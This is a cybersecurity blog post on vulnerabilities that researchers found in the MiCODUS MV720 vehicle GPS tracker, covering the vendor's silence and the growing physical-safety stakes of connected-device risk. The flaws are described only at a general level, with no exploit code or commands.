What if hackers took control of your car? This hypothetical has been floating around for decades as an illustrative example of what could happen when cyber attacks bleed into the physical world. The idea of being behind the wheel yet totally at the mercy of an invisible, malicious driver is terrifying to say the least. So I have some bad news: the hypothetical has become a reality.

Major Flaws Found in Popular Auto Tech

I am not the first person to observe that today’s cars are essentially computers on wheels. Highly digital and internet-connected, cars work basically like any other IT asset – except for the fact that they weigh a ton and go 100 miles per hour.

As cars have become increasingly digital, an aftermarket has developed for automotive tech that supplements the systems built into the car to increase performance, comfort, etc. GPS trackers are one example. Popular on fleet vehicles, GPS trackers record and report a vehicle’s location and, to varying degrees, control what the vehicle can do.

Cybersecurity researchers at BitSight recently evaluated one of these trackers: the MiCODUS MV720. They discovered significant security flaws. I will cover those in a second. But first, consider the potential risks of those flaws, as highlighted by the researchers:

  • Injury or loss of life
  • National security breaches
  • Property damage
  • Supply chain disruptions
  • Individual or fleet-wide ransomware
  • Surveillance and tracking

Any (or all) of these scenarios are possible because the flaws the researchers discovered allow hackers to gain administrative privileges over the trackers. Those privileges let them track vehicle locations (for who knows what nefarious purpose). Worse, these trackers give administrators the ability to disable the engine at will.

Hackers may not be able to drive the car off a bridge. But they can still cause ample chaos, put lots of lives at risk, and bring down an entire vehicle fleet all at once.

Eager to emphasize how alarming these flaws are, the researchers propose several possible exploits. Hackers could disable emergency vehicles en masse so that police and fire can’t respond. They could monitor when a vehicle is on a busy highway and cut power suddenly to cause a multi-car pileup. They could use tracking capabilities to surreptitiously spy on someone everywhere they go. Or they could disable a vehicle and demand a ransom to restore access. Unfortunately, this list barely begins to cover all that could go wrong when vehicles become a tool of cyber attacks.

Where Researchers Found Flaws

The six flaws found in the GPS trackers are worth reviewing for what they reveal about the flaws lurking in insecure connected devices (automotive or otherwise) and the tactics hackers use to exploit them:

  • Hardcoded Password – Using a master password lets unauthenticated users take control of any tracker.
  • Broker Authentication – Authentication issues let hackers exploit the API server to launch a man-in-the-middle attack.
  • Default Password – Weak default passwords (123456) combined with no prompt or requirement to change them leave devices vulnerable.
  • Reflected XSS – Taking control of a script in the victim’s browser gives the perpetrator the same data and permissions the exploited user has.
  • 2 Insecure Direct Object References – Two different flaws in the web server permit hackers to alter and access information without authentication.

Perhaps more alarming than the flaws themselves is MiCODUS’ reaction when confronted with them: complete silence. Researchers made multiple attempts to share their findings with the developer, but all of those efforts were rebuffed, so they went to the Cybersecurity and Infrastructure Security Agency (CISA), which has also been unsuccessful at engaging the vendor.

It’s one thing to sell insecure devices. It’s another thing to ignore those flaws – especially when the consequences are so severe.

The Frightening Evolution of Cyber Risk

We can draw lots of conclusions from this incident, about the pervasive vulnerability of connected devices, about the egregious disregard of developers, and about the unforeseen consequences of digitization.

But what jumps out to me about this story is what it says about the evolution of cyber risk. This is just one of several recent examples of cyber attacks putting human health and safety in danger. The stakes in cybersecurity are suddenly much higher. And escalating faster than ever given the recent rise of ransomware and state-sponsored hacking. To me, this looks like the trajectory of cyber risk taking a sharp turn upwards and moving into unprecedented territory. Which is all to say, if the flaws in the GPS tracker seem bad, just wait until these flaws exist in every part of the built world. Will anything be safe?

I have my own complicated opinions, but I’m eager to hear yours. What do you think are the new frontiers of cyber risk? Can we make these risks manageable, and how? When will we start to see automotive cyber attacks become commonplace?

Admittedly, I don’t have good answers to all these questions. But if we aren’t asking them, we are doing the same thing as MiCODUS: turning a blind eye to a problem staring us directly in the face.

#blog #cybersecurity #automotive #IoT #CISA #vicarius_blog

